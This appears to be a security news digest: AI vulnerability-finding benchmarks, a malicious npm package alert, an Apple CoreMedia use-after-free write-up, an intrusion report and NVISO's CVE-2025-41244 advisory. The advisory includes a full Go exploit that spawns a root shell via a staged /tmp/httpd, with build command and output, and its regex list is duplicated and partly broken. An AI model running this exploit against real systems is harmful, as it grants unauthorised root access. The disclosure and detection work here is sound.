Claude Sonnet 4.5 scores significantly better than either Claude Sonnet 4 or Claude Opus 4. When using the same cost constraints as the public CyberGym leaderboard (i.e., a limit of $2 of API queries per vulnerability) we find that Sonnet 4.5 achieves a new state-of-the-art score of 28.9%. But true attackers are rarely limited in this way: they can attempt many attacks, for far more than $2 per trial. When we remove these constraints and give Claude 30 trials per task, we find that Sonnet 4.5 reproduces vulnerabilities in 66.7% of programs. And although the relative price of this approach is higher, the absolute cost—about $45 to try one task 30 times—remains quite low.

Figure 2: Model Performance on CyberGym—Sonnet 4.5 outperforms all previous models, including Opus 4.1.

*Note that Opus 4.1, given its higher price, did not follow the same $2 cost constraint as the other models in the one-trial scenario.

Equally interesting is the rate at which Claude Sonnet 4.5 discovers new vulnerabilities. While the CyberGym leaderboard shows that Claude Sonnet 4 only discovers vulnerabilities in about 2% of targets, Sonnet 4.5 discovers new vulnerabilities in 5% of cases. By repeating the trial 30 times it discovers new vulnerabilities in over 33% of projects.

Figure 3: Model Performance on CyberGym—Sonnet 4.5 outperforms Sonnet 4 at new vulnerability discovery with only one trial and dramatically outstrips its performance when given 30 trials.
Further research into patching
We are also conducting preliminary research into Claude's ability to generate and review patches that fix vulnerabilities. Patching vulnerabilities is a harder task than finding them because the model has to make surgical changes that remove the vulnerability without altering the original functionality. Without guidance or specifications, the model has to infer this intended functionality from the code base.

In our experiment we tasked Claude Sonnet 4.5 with patching vulnerabilities in the CyberGym evaluation set based on a description of the vulnerability and information about what the program was doing when it crashed. We used Claude to judge its own work, asking it to grade the submitted patches by comparing them to human-authored reference patches. 15% of the Claude-generated patches were judged to be semantically equivalent to the human-generated patches. However, this comparison-based approach has an important limitation: because vulnerabilities can often be fixed in multiple valid ways, patches that differ from the reference may still be correct, leading to false negatives in our evaluation.

We manually analyzed a sample of the highest-scoring patches and found them to be functionally identical to reference patches that have been merged into the open-source software on which the CyberGym evaluation is based. This work reveals a pattern consistent with our broader findings: Claude develops cyber-related skills as it generally improves. Our preliminary results suggest that patch generation—like vulnerability discovery before it—is an emergent capability that could be enhanced with focused research. Our next step is to systematically address the challenges we've identified to make Claude a reliable patch author and reviewer.

Conferring with trusted partners
Real world defensive security is more complicated in practice than our evaluations can capture. We’ve consistently found that real problems are more complex, challenges are harder, and implementation details matter a lot. Therefore, we feel it is important to work with the organizations actually using AI for defense to get feedback on how our research could accelerate them. In the lead-up to Sonnet 4.5 we worked with a number of organizations who applied the model to their real challenges in areas like vulnerability remediation, testing network security, and threat analysis.

Nidhi Aggarwal, Chief Product Officer of HackerOne, said, “Claude Sonnet 4.5 reduced average vulnerability intake time for our Hai security agents by 44% while improving accuracy by 25%, helping us reduce risk for businesses with confidence.” According to Sven Krasser, Senior Vice President for Data Science and Chief Scientist at CrowdStrike, “Claude shows strong promise for red teaming—generating creative attack scenarios that accelerate how we study attacker tradecraft. These insights strengthen our defenses across endpoints, identity, cloud, data, SaaS, and AI workloads.”

These testimonials made us more confident in the potential for applied, defensive work with Claude.

What’s next?
Claude Sonnet 4.5 represents a meaningful improvement, but we know that many of its capabilities are nascent and do not yet match those of security professionals and established processes. We will keep working to improve the defense-relevant capabilities of our models and enhance the threat intelligence and mitigations that safeguard our platforms. In fact, we have already been using results of our investigations and evaluations to continually refine our ability to catch misuse of our models for harmful cyber behavior. This includes using techniques like organization-level summarization to understand the bigger picture beyond just a singular prompt and completion; this helps disaggregate dual-use behavior from nefarious behavior, particularly for the most damaging use-cases involving large scale automated activity.

But we believe that now is the time for as many organizations as possible to start experimenting with how AI can improve their security posture and build the evaluations to assess those gains. Automated security reviews in Claude Code show how AI can be integrated into the CI/CD pipeline. We would specifically like to enable researchers and teams to experiment with applying models in areas like Security Operations Center (SOC) automation, Security Information and Event Management (SIEM) analysis, secure network engineering, or active defense. We would like to see and use more evaluations for defensive capabilities as part of the growing third-party ecosystem for model evaluations.

But even building and adopting AI to advantage defenders is only part of the solution. We also need conversations about making digital infrastructure more resilient and new software secure by design—including with help from frontier AI models. We look forward to these discussions with industry, government, and civil society as we navigate the moment when AI’s impact on cybersecurity transitions from being a future concern to a present-day imperative.

Security Alert: Malicious 'postmark-mcp' npm Package Impersonating Postmark | Postmark

Alert: A malicious npm package named 'postmark-mcp' was impersonating Postmark to steal user emails. Postmark is not affiliated with this fraudulent package.

We recently became aware of a malicious npm package called "postmark-mcp" on npm that was impersonating Postmark and stealing user emails. We want to be crystal clear: Postmark had absolutely nothing to do with this package or the malicious activity.

Here's what happened: A malicious actor created a fake package on npm impersonating our name, built trust over 15 versions, then added a backdoor in version 1.0.16 that secretly BCC’d emails to an external server.

What you should know:

This is not an official Postmark tool. We have not published our Postmark MCP server on npm prior to this incident
We didn't develop, authorize, or have any involvement with the "postmark-mcp" npm package
The legitimate Postmark API and services remain secure and unaffected by this incident
If you've used this fake package:

Remove it immediately from your systems
Check your email logs for any suspicious activity
Consider rotating any credentials that may have been sent via email during the compromise period
This situation highlights why we take our API security and developer trust so seriously. When you integrate with Postmark, you're working directly with our official, documented APIs—not third-party packages that claim to represent us. If you are not sure what official resources are available, you can find them via the links below, which are always available to our customers:

Our official resources:

Official Postmark MCP - Github
API documentation
Official libraries and SDKs
Support channels or email security@activecampaign.com if you have questions

CVE-2025-24085

github.com/b1n4r1b01

This vulnerability has been labeled under the title CoreMedia, which is a gigantic sub-system on Apple platforms. CoreMedia includes multiple public and private frameworks in the shared cache, including CoreMedia.framework, AVFoundation.framework, MediaToolbox.framework, etc. All of these work hand in hand and provide users with multiple low-level IPC endpoints and high-level APIs. There are tons of vulnerabilities labeled as CoreMedia listed on Apple's security advisory website, ranging from sensitive file access to metadata corruption in media files. In fact, iOS 18.3, where this bug was patched, lists 3 CVEs under the CoreMedia label, but only this one is labeled as a UAF issue, so we can use that as a starting point for our research.

After a lot of diffing, I found that this specific vulnerability lives in the Remaker sub-system of MediaToolbox.framework, in the improper handling of the FigRemakerTrack object.

remaker_AddVideoCompositionTrack(FigRemaker, ..., ...)
{
    // Allocates FigRemakerTrack (alias channel)
    ret = remakerFamily_createChannel(FigRemaker, 0, 'vide', &FigRemakerTrack);

    ...

    // Links FigRemakerTrack to FigRemaker
    ret = remakerFamily_finishVideoCompositionChannel(FigRemaker, ..., ...);

    if (ret) {
        // Failure path, means FigRemakerTrack is not linked to FigRemaker
        goto exit;
    }
    else {
        // Success path, means FigRemakerTrack is linked to FigRemaker

        ...

        ret = URLAsset->URLAssetCopyTrackByID(URLAsset, user_controlled_trackID, &outTrack);

        if (ret) {
            // Failure path, if we can make URLAssetCopyTrackByID fail we never zero out FigRemakerTrack
            goto exit;  // <-- buggy route
        }
        else {
            // Success path

            FigWriter->FigWriter_SetTrackProperty(FigWriter, FigRemakerTrack.someTrackID, "MediaTimeScale", value);

            FigRemakerTrack = 0;
            goto exit;
        }
    }

exit:
    // This function will call CFRelease on the FigRemakerTrack
    remakerFamily_discardChannel(FigRemaker, FigRemakerTrack);

    ...
}
By providing an OOB user_controlled_trackID we can force the control flow to take the buggy route where we free the FigRemakerTrack object while FigRemaker still holds a reference to it.

Reaching the vulnerable code
Reaching this vulnerable code was quite tricky, as you need to deal with multiple XPC endpoints. In my original PoC I had to use 6 XPC endpoints (com.apple.coremedia.mediaplaybackd.mutablecomposition.xpc, com.apple.coremedia.mediaplaybackd.sandboxserver.xpc, com.apple.coremedia.mediaplaybackd.customurlloader.xpc, com.apple.coremedia.mediaplaybackd.asset, com.apple.coremedia.mediaplaybackd.remaker.xpc, and com.apple.coremedia.mediaplaybackd.formatreader.xpc) to trigger the bug, but in my final PoC I boiled them down to just 3 endpoints. Since I'm not using low-level XPC to communicate with the endpoint, this PoC only works on iOS 18; my tests were specifically done on iOS 18.2.

To reach this path you need to:

Create a Remaker object
Enqueue the buggy AddVideoComposition request
Start processing the request (this should free the FigRemakerTrack)
???
Profit?
Impact
This bug lets you get code execution in mediaplaybackd. In the provided PoC, I am simply double-freeing the FigRemakerTrack by first freeing it with the bug and then closing the XPC connection to trigger cleanup of the FigRemaker object, and thus crashing. Exploiting this kind of CoreFoundation UAF has been made harder since iOS 18 due to changes in the CoreFoundation allocator. But exploiting this bug on iOS 17 should be manageable due to a weaker malloc type implementation; I was very reliably able to place fake objects after the first free on iOS 17.

In-The-Wild angle
If you look at this bug's advisory you can find that Apple clearly says this bug was part of some iOS chain: "Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 17.2." Now the weird part is that you don't see the "exploited against versions of iOS before iOS XX.X" line very often in security updates. If we look at CVEs from those days, we see a WebKit -> UIProcess (I guess?) bug, CVE-2025-24201, with a very similar impact description: "This is a supplementary fix for an attack that was blocked in iOS 17.2. (Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 17.2.)" And if we go back to iOS 17.2/17.3 we see a couple of CVEs which look like parts of a chain, all labeled as actively exploited and not attributed to any third party like Google TAG or a human-rights security lab. I now believe this mediaplaybackd sandbox escape was a second-stage sandbox escape in an iOS ITW chain. Here's what my speculated iOS 17 chain looks like (could be totally wrong but we'll probably never know):

WebKit (CVE-2024-23222)

UIProc sbx (CVE-2025-24201)

mediaplaybackd sbx (CVE-2025-24085)

Kernel ???

PAC?/PPL (CVE-2024-23225 / CVE-2024-23296)
Question is: how many pivots are too many pivots? :P

From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion

The DFIR Report - thedfirreport.com/2025/09/29 September 29, 2025

Key Takeaways
The intrusion began with a Lunar Spider-linked JavaScript file disguised as a tax form that downloaded and executed Brute Ratel via an MSI installer.
Multiple types of malware were deployed across the intrusion, including Latrodectus, Brute Ratel C4, Cobalt Strike, BackConnect, and a custom .NET backdoor.
Credentials were harvested from several sources, including LSASS, backup software, and browsers, as well as a Windows Answer file used for automated provisioning.
Twenty days into the intrusion, data was exfiltrated using Rclone and FTP.
Threat actor activity persisted for nearly two months with intermittent command and control (C2) connections, discovery, lateral movement, and data exfiltration.
This case was featured in our September 2025 DFIR Labs Forensics Challenge and is available as a lab today here for one-time access or included in our new subscription plan. It was originally published as a Threat Brief to customers in February 2025.

Case Summary
The intrusion took place in May 2024, when a user executed a malicious JavaScript file. This JavaScript file had previously been reported by EclecticIQ as associated with the Lunar Spider initial access group. The heavily obfuscated file, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among extensive filler content used for evasion. The JavaScript payload triggered the download of an MSI package, which deployed a Brute Ratel DLL file using rundll32.

The Brute Ratel loader subsequently injected Latrodectus malware into the explorer.exe process, and established command and control communications with multiple CloudFlare-proxied domains. The Latrodectus payload was then observed retrieving a stealer module. Around one hour after initial access, the threat actor began reconnaissance activities using built-in Windows commands for host and domain enumeration, including ipconfig, systeminfo, nltest, and whoami commands.

Approximately six hours after initial access, the threat actor established a BackConnect session, and initiated VNC-based remote access capabilities. This allowed them to browse the file system and upload additional malware to the beachhead host.

On day three, the threat actor discovered and accessed an unattend.xml Windows Answer file containing plaintext domain administrator credentials left over from an automated deployment process. This provided the threat actor with immediate high-privilege access to the domain environment.
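Leftover answer files of this kind are a well-known source of plaintext credentials. As a defensive illustration (ours, not part of the report), the sketch below checks a handful of locations where unattend.xml files are commonly left behind, drawn from standard privilege-escalation checklists rather than the specific path used in this intrusion, and flags any that still contain password elements.

package main

import (
    "fmt"
    "os"
    "strings"
)

func main() {
    // Commonly cited locations for leftover Windows answer files; these paths
    // are an assumption based on public hardening checklists, not taken from
    // the intrusion described above.
    paths := []string{
        `C:\unattend.xml`,
        `C:\Windows\Panther\Unattend.xml`,
        `C:\Windows\Panther\Unattend\Unattend.xml`,
        `C:\Windows\System32\Sysprep\unattend.xml`,
        `C:\Windows\System32\Sysprep\sysprep.xml`,
    }

    for _, p := range paths {
        data, err := os.ReadFile(p)
        if err != nil {
            continue // file absent or unreadable
        }
        content := strings.ToLower(string(data))
        // Flag password material that was not blanked out after provisioning.
        if strings.Contains(content, "<password>") &&
            !strings.Contains(content, "*sensitive*data*deleted*") {
            fmt.Printf("answer file with credential material left behind: %s\n", p)
        }
    }
}

Blanking or deleting these files after provisioning, and avoiding plaintext domain administrator credentials in them in the first place, removes this escalation path.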

On day four, the threat actor expanded their activity by deploying Cobalt Strike beacons. They escalated privileges using Windows’ Secondary Logon service and the runas command to authenticate as the domain admin account found the prior day. The threat actor then conducted extensive Active Directory reconnaissance using AdFind. Around an hour after this discovery activity they began lateral movement. They used PsExec to remotely deploy Cobalt Strike DLL beacons to several remote hosts including a domain controller as well as file and backup servers.

They then paused for around five hours. On their return, they deployed a custom .NET backdoor that created a scheduled task for persistence and set up an additional command and control channel. They also dropped another Cobalt Strike beacon that used a new command and control server. They then used a custom tool exploiting the Zerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement to a second domain controller. After that, they tried to execute Metasploit laterally to that domain controller via a remote service; however, they were unable to establish a command and control channel from this action.

On day five, the threat actor returned using RDP to access a new server, on which they dropped the newest Cobalt Strike beacon. This was followed by an RDP logon to a file share server where they also deployed Cobalt Strike. Around 12 hours after that, they returned to the beachhead host and replaced the Brute Ratel file used for persistence with a new Brute Ratel badger DLL. After this, there was a large gap before their next actions.

Fifteen days later, on the 20th day since initial access, the threat actor became active again. They deployed a set of scripts to execute a renamed Rclone binary to exfiltrate data from the file share server. This exfiltration used FTP to send data over a roughly 10-hour period to the threat actor’s remote host. After this concluded, there was another pause in threat actor activity.

On the 26th day of the intrusion, the threat actor returned to the backup server and used a PowerShell script to dump credentials from the backup server software. Two days later, they appeared on the backup server again and dropped a network scanning tool, rustscan, which they used to scan subnets across the environment. After this, hands-on activity ceased again.

The threat actor maintained intermittent command and control access for nearly two months following initial compromise, leveraging BackConnect VNC capabilities and multiple payloads, including Latrodectus, Brute Ratel, and Cobalt Strike, before being evicted from the environment. Despite the extended dwell time and comprehensive access to critical infrastructure, no ransomware deployment was observed during this intrusion.

You name it, VMware elevates it (CVE-2025-41244)

blog.nviso.eu - Maxime Thiebaut, Incident Response & Threat Researcher, NVISO CSIRT - 29.09.2025

NVISO has identified zero-day exploitation of CVE-2025-41244, a local privilege escalation vulnerability impacting VMware's guest service discovery features.

On September 29th, 2025, Broadcom disclosed a local privilege escalation vulnerability, CVE-2025-41244, impacting VMware’s guest service discovery features. NVISO has identified zero-day exploitation in the wild beginning mid-October 2024.

The vulnerability impacts both the VMware Tools and VMware Aria Operations. When successful, exploitation of the local privilege escalation results in unprivileged users achieving code execution in privileged contexts (e.g., root).

Throughout its incident response engagements, NVISO determined with confidence that UNC5174 triggered the local privilege escalation. We cannot, however, assess whether this exploit was part of UNC5174’s capabilities or whether the zero-day’s usage was merely accidental given its triviality. UNC5174, a Chinese state-sponsored threat actor, has repeatedly been linked to initial access operations achieved through public exploitation.

Background
Organizations relying on the VMware hypervisor commonly employ the VMware Aria Suite to manage their hybrid‑cloud workloads from a single console. Within this VMware Aria Suite, VMware Aria Operations is the component that provides performance insights, automated remediation, and capacity planning for the different hybrid‑cloud workloads. As part of its performance insights, VMware Aria Operations is capable of discovering which services and applications are running in the different virtual machines (VMs), a feature offered through the Service Discovery Management Pack (SDMP).

The discovery of these services and applications can be achieved in either of two modes:

The legacy credential-based service discovery relies on VMware Aria Operations running metrics collector scripts within the guest VM using a privileged user. In this mode, all the collection logic is managed by VMware Aria Operations and the guest’s VMware Tools merely acts as a proxy for the performed operations.
The credential-less service discovery is a more recent approach where the metrics collection has been implemented within the guest’s VMware Tools itself. In this mode, no credentials are needed as the collection is performed under the already privileged VMware Tools context.
As part of its discovery, NVISO was able to confirm the privilege escalation affects both modes, with the logic flaw hence being respectively located within VMware Aria Operations (in credential-based mode) and the VMware Tools (in credential-less mode). While VMware Aria Operations is proprietary, the VMware Tools are available as an open-source variant known as VMware’s open-vm-tools, distributed on most major Linux distributions. The following CVE-2025-41244 analysis is performed on this open-source component.

Analysis
Within open-vm-tools’ service discovery feature, the component handling the identification of a service’s version is achieved through the get-versions.sh shell script. As part of its logic, the get-versions.sh shell script has a generic get_version function. The function takes as argument a regular expression pattern, used to match supported service binaries (e.g., /usr/bin/apache), and a version command (e.g., -v), used to indicate how a matching binary should be invoked to retrieve its version.

When invoked, get_version loops over $space_separated_pids, a list of all processes with a listening socket. For each process, it checks whether the service binary (e.g., /usr/bin/apache) matches the regular expression and, if so, invokes the supported service’s version command (e.g., /usr/bin/apache -v).

get_version() {
    PATTERN=$1
    VERSION_OPTION=$2
    for p in $space_separated_pids
    do
        COMMAND=$(get_command_line $p | grep -Eo "$PATTERN")
        [ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]*}" $VERSION_OPTION 2>&1)" VERSIONEND
    done
}
The get_version function is called using several supported patterns and associated version commands. While this functionality works as expected for system binaries (e.g., /usr/bin/httpd), the usage of the broad‑matching \S character class (matching non‑whitespace characters) in several of the regex patterns also matches non-system binaries (e.g., /tmp/httpd). These non-system binaries are located within directories (e.g., /tmp) which are writable to unprivileged users by design.

get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v
get_version "/usr/(bin|sbin)/apache\S" -v
get_version "/\S+/mysqld($|\s)" -V
get_version ".?/\S
nginx($|\s)" -v
get_version "/\S+/srm/bin/vmware-dr($|\s)" --version
get_version "/\S+/dataserver($|\s)" -v
get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v
get_version "/usr/(bin|sbin)/apache\S" -v
get_version "/\S+/mysqld($|\s)" -V
get_version ".?/\S
nginx($|\s)" -v
get_version "/\S+/srm/bin/vmware-dr($|\s)" --version
get_version "/\S+/dataserver($|\s)" -v
By matching and subsequently executing non-system binaries (CWE-426: Untrusted Search Path), the service discovery feature can be abused by unprivileged users through the staging of malicious binaries (e.g., /tmp/httpd) which are subsequently elevated for version discovery. As simple as it sounds, you name it, VMware elevates it.
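To make the over-broad matching concrete, the short sketch below (our illustration, not part of the original advisory) applies the first pattern above to two example process command lines; both the legitimate system binary and an attacker-staged /tmp/httpd match.

package main

import (
    "fmt"
    "regexp"
)

func main() {
    // One of the SDMP patterns shown above; \S+ happily matches /tmp as well as /usr/sbin.
    pattern := regexp.MustCompile(`/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)`)

    for _, cmdline := range []string{
        "/usr/sbin/httpd -DFOREGROUND", // legitimate system binary
        "/tmp/httpd",                   // attacker-staged binary in a world-writable directory
    } {
        fmt.Printf("%-32q matches: %v\n", cmdline, pattern.MatchString(cmdline))
    }
}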

Proof of Concept
To abuse this vulnerability, an unprivileged local attacker can stage a malicious binary within any of the broadly-matched regular expression paths. A simple common location, abused in the wild by UNC5174, is /tmp/httpd. To ensure the malicious binary is picked up by the VMware service discovery, the binary must be running as the unprivileged user (i.e., show up in the process tree) and hold at least one (random) listening socket.

The following bare-bone CVE-2025-41244.go proof-of-concept can be used to demonstrate the privilege escalation.

package main

import (
    "fmt"
    "io"
    "net"
    "os"
    "os/exec"
)

func main() {
    // If started with an argument (e.g., -v or --version), assume we're the privileged process.
    // Otherwise, assume we're the unprivileged process.
    if len(os.Args) >= 2 {
        if err := connect(); err != nil {
            panic(err)
        }
    } else {
        if err := serve(); err != nil {
            panic(err)
        }
    }
}

func serve() error {
    // Open a dummy listener, ensuring the service can be discovered.
    dummy, err := net.Listen("tcp", "127.0.0.1:0")
    if err != nil {
        return err
    }
    defer dummy.Close()

    // Open a listener to exchange stdin, stdout and stderr streams.
    l, err := net.Listen("unix", "@cve")
    if err != nil {
        return err
    }
    defer l.Close()

    // Loop privilege escalations, but don't do concurrency.
    for {
        if err := handle(l); err != nil {
            return err
        }
    }
}

func handle(l net.Listener) error {
    // Wait for the privileged stdin, stdout and stderr streams.
    fmt.Println("Waiting on privileged process...")

    stdin, err := l.Accept()
    if err != nil {
        return err
    }
    defer stdin.Close()

    stdout, err := l.Accept()
    if err != nil {
        return err
    }
    defer stdout.Close()

    stderr, err := l.Accept()
    if err != nil {
        return err
    }
    defer stderr.Close()

    // Interconnect stdin, stdout and stderr.
    fmt.Println("Connected to privileged process!")
    errs := make(chan error, 3)

    go func() {
        _, err := io.Copy(os.Stdout, stdout)
        errs <- err
    }()
    go func() {
        _, err := io.Copy(os.Stderr, stderr)
        errs <- err
    }()
    go func() {
        _, err := io.Copy(stdin, os.Stdin)
        errs <- err
    }()

    // Abort as soon as any of the interconnected streams fails.
    _ = <-errs
    return nil
}

func connect() error {
    // Define the privileged shell to execute.
    cmd := exec.Command("/bin/sh", "-i")

    // Connect to the unprivileged process.
    stdin, err := net.Dial("unix", "@cve")
    if err != nil {
        return err
    }
    defer stdin.Close()

    stdout, err := net.Dial("unix", "@cve")
    if err != nil {
        return err
    }
    defer stdout.Close()

    stderr, err := net.Dial("unix", "@cve")
    if err != nil {
        return err
    }
    defer stderr.Close()

    // Interconnect stdin, stdout and stderr.
    fmt.Fprintln(stdout, "Starting privileged shell...")
    cmd.Stdin = stdin
    cmd.Stdout = stdout
    cmd.Stderr = stderr

    return cmd.Run()
}
Once compiled to a matching path (e.g., go build -o /tmp/httpd CVE-2025-41244.go) and executed, the above proof of concept will spawn an elevated root shell as soon as the VMware metrics collection is executed. This process, at least in credential-less mode, has historically been documented to run every 5 minutes.

nobody@nviso:/tmp$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@nviso:/tmp$ /tmp/httpd
Waiting on privileged process...
Connected to privileged process!
Starting privileged shell...
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
#
Credential-based Service Discovery
When service discovery operates in the legacy credential-based mode, VMware Aria Operations will eventually trigger the privilege escalation once it runs the metrics collector scripts. Following successful exploitation, the unprivileged user will have achieved code execution within the privileged context of the configured credentials. The process tree below was obtained by running the ps -ef --forest command through the privilege escalation shell; the entries up to line 4 are legitimate, while the entries from line 5 onward are part of the proof-of-concept exploit.

UID        PID  PPID  C STIME TTY      TIME CMD
root       806     1  0 08:54 ?    00:00:21 /usr/bin/vmtoolsd
root     80617   806  0 13:20 ?    00:00:00  \_ /usr/bin/vmtoolsd
root     80618 80617  0 13:20 ?    00:00:00      \_ /bin/sh /tmp/VMware-SDMP-Scripts-193-fb2553a0-d63c-44e5-90b3-e1cda71ae24c/script_-28702555433556123420.sh
root     80621 80618  0 13:20 ?    00:00:00          \_ /tmp/httpd -v
root     80626 80621  0 13:20 ?    00:00:00              \_ /bin/sh -i
root     81087 80626 50 13:22 ?    00:00:00                  \_ ps -ef --forest
Credential-less Service Discovery
When service discovery operates in the modern credential-less mode, the VMware Tools will eventually trigger the privilege escalation once it runs the collector plugin. Following successful exploitation, the unprivileged user will have achieved code execution within the privileged VMware Tools user context. The process tree below was obtained by running the ps -ef --forest command through the privilege escalation shell; the first entry is legitimate, while all subsequent entries (line 3 and beyond) are part of the proof-of-concept exploit.

UID        PID  PPID  C STIME TTY      TIME CMD
root     10660     1  0 13:42 ?    00:00:00 /bin/sh /usr/lib/x86_64-linux-gnu/open-vm-tools/serviceDiscovery/scripts/get-versions.sh
root     10688 10660  0 13:42 ?    00:00:00  \_ /tmp/httpd -v
root     10693 10688  0 13:42 ?    00:00:00      \_ /bin/sh -i
root     11038 10693  0 13:44 ?    00:00:00          \_ ps -ef --forest
Detection
Successful exploitation of CVE-2025-41244 can easily be detected through the monitoring of uncommon child processes as demonstrated in the above process trees. Being a local privilege escalation, abuse of CVE-2025-41244 is indicative that an adversary has already gained access to the affected device and that several other detection mechanisms should have triggered.
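As a rough illustration of that child-process heuristic, the sketch below (ours, not NVISO's, and a point-in-time check rather than a production monitoring rule) walks /proc on a Linux guest and flags processes whose executable resides under /tmp and whose parent command line points at vmtoolsd, get-versions.sh, or an SDMP collector script, mirroring the process trees above.

package main

import (
    "fmt"
    "os"
    "strconv"
    "strings"
)

// cmdline returns the full command line of a process, with NUL separators
// replaced by spaces, or "" if it cannot be read.
func cmdline(pid int) string {
    b, err := os.ReadFile(fmt.Sprintf("/proc/%d/cmdline", pid))
    if err != nil {
        return ""
    }
    return strings.ReplaceAll(strings.TrimRight(string(b), "\x00"), "\x00", " ")
}

// ppid extracts the parent PID from /proc/<pid>/stat (the field right after
// the process state, which follows the parenthesised command name).
func ppid(pid int) int {
    b, err := os.ReadFile(fmt.Sprintf("/proc/%d/stat", pid))
    if err != nil {
        return 0
    }
    s := string(b)
    i := strings.LastIndex(s, ")")
    if i < 0 {
        return 0
    }
    fields := strings.Fields(s[i+1:])
    if len(fields) < 2 {
        return 0
    }
    p, _ := strconv.Atoi(fields[1])
    return p
}

func main() {
    // Run as root so /proc/<pid>/exe links of other users' processes are readable.
    entries, err := os.ReadDir("/proc")
    if err != nil {
        panic(err)
    }
    for _, e := range entries {
        pid, err := strconv.Atoi(e.Name())
        if err != nil {
            continue // not a process directory
        }
        exe, err := os.Readlink(fmt.Sprintf("/proc/%d/exe", pid))
        if err != nil || !strings.HasPrefix(exe, "/tmp/") {
            continue // only consider binaries executing out of /tmp
        }
        parent := cmdline(ppid(pid))
        if strings.Contains(parent, "get-versions.sh") ||
            strings.Contains(parent, "VMware-SDMP-Scripts") ||
            strings.Contains(parent, "vmtoolsd") {
            fmt.Printf("suspicious child: pid=%d exe=%s parent=%q\n", pid, exe, parent)
        }
    }
}

In practice this logic belongs in an EDR or auditd/eBPF rule rather than a polling loop, but the signal is the same: version probes should never end up executing binaries from world-writable paths.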

Under certain circumstances, exploitation may be confirmed forensically in the legacy credential-based mode through the analysis of lingering metrics collector scripts and outputs under the /tmp/VMware-SDMP-Scripts-{UUID}/ folders. While less than ideal, this approach may serve as a last resort in environments without process monitoring on compromised machines. The following redacted metrics collector script was recovered from the /tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.sh location and mentions the matched non-system service binary on its last line.

#!/bin/sh
if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout"
fi
if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr"
fi
unset LINES;
unset COLUMNS;
/tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr"

Conclusions
While NVISO identified these vulnerabilities through its UNC5174 incident response engagements, the vulnerabilities’ triviality and the adversary practice of mimicking system binaries (T1036.005) do not allow us to determine with confidence whether UNC5174 exploited them willfully.

The broad practice of mimicking system binaries (e.g., httpd) highlights the real possibility that several other malware strains have accidentally benefited from unintended privilege escalations for years. Furthermore, the ease with which these vulnerabilities could be identified in the open-vm-tools source code makes it unlikely that knowledge of the privilege escalations did not predate NVISO’s in-the-wild identification.

Timeline
2025-05-19: Forensic artifact anomaly noted during UNC5174 incident response engagement.
2025-05-21: Forensic artifact anomaly attributed to unknown zero-day vulnerability.
2025-05-25: Zero day vulnerability identified and reproduced in a lab environment.
2025-05-27: Responsible disclosure authorized and initiated through Broadcom.
2025-05-28: Responsible disclosure triaged, investigation started by Broadcom.
2025-06-18: Embargo extended by Broadcom until no later than October to align release cycles.
2025-09-29: Embargo lifted, CVE-2025-41244 patches and advisory published.

Geneva: Three individuals arrested over fake fine scams - lematin.ch

Three men were arrested for using fraudulent text messages to defraud victims.

The Geneva public prosecutor's office announced this Thursday the arrest of three people accused of fake fine scams. Two of the individuals are 21 years old, the third is 30. One was arrested on July 23, the other two more recently, on September 5 and 7.

Two were arrested in vehicles containing "SMS-Blasters"; the third individual is the owner of one of the vehicles.

SMS-Blasters? These devices impersonate mobile operators' antennas in order to harvest phone numbers and send text messages containing a link to fraudulent websites.

An example given by the public prosecutor's office: "parkings-ge.com", which imitates the official website of the Geneva parking foundation.

Fake bank adviser
"The recipients of the text messages were asked to pay a fake parking fine and to provide their personal and banking details for that purpose," the office explains. "In a second step, the victims were contacted by a fake bank adviser, who pressured them into handing over the codes needed to make withdrawals from their bank account."

The three arrested individuals are being prosecuted for fraud and misuse of a telecommunications installation.

For more information, the Geneva police recently detailed these fake parking fine scams, together with the usual recommendations, the main ones being not to disclose personal data and to verify the legitimacy of the other party in any financial or urgent request.

Fake fine scam: three people arrested

justice.ge.ch 25/09/25 Press release - Public Prosecutor's Office, Geneva

Between July 23 and September 7, 2025, two individuals aged 21 and another aged 30 were arrested. They are suspected of having taken part in sending text messages urging recipients to pay a fake parking fine.

In Geneva, three people were arrested on July 23, September 5 and September 7, 2025, two of them in vehicles containing devices known as "SMS-Blasters", the third person being the owner of one of the vehicles.

They are suspected of having used these devices, which impersonate mobile operators' antennas, to harvest phone numbers and send text messages containing a link to fraudulent websites such as "parkings-ge.com", imitating the official website of the parking foundation, "amendes.ch". The recipients of the text messages were asked to pay a fake parking fine and to provide their personal and banking details for that purpose.

In a second step, the victims were contacted by a fake bank adviser, who pressured them into handing over the codes needed to make withdrawals from their bank account.

For these acts, the defendants are being prosecuted for fraud (Art. 146 of the Swiss Criminal Code) and misuse of a telecommunications installation (Art. 179septies of the Swiss Criminal Code).

The investigation is being conducted by the cybercrime brigade under the direction of prosecutor Vanessa SCHWAB.

The defendants are presumed innocent.

Six months of mandatory reporting of cyberattacks against critical infrastructure

news.admin.ch Bern, 29.09.2025

— The legal obligation to report cyberattacks against critical infrastructure entered into force on April 1, 2025. The Federal Office for Cybersecurity (OFCS) draws a positive assessment after the first six months. So far, a total of 164 cyberattacks against critical infrastructure have been reported. The sanctions provided for in the event of non-reporting enter into force on October 1, 2025.

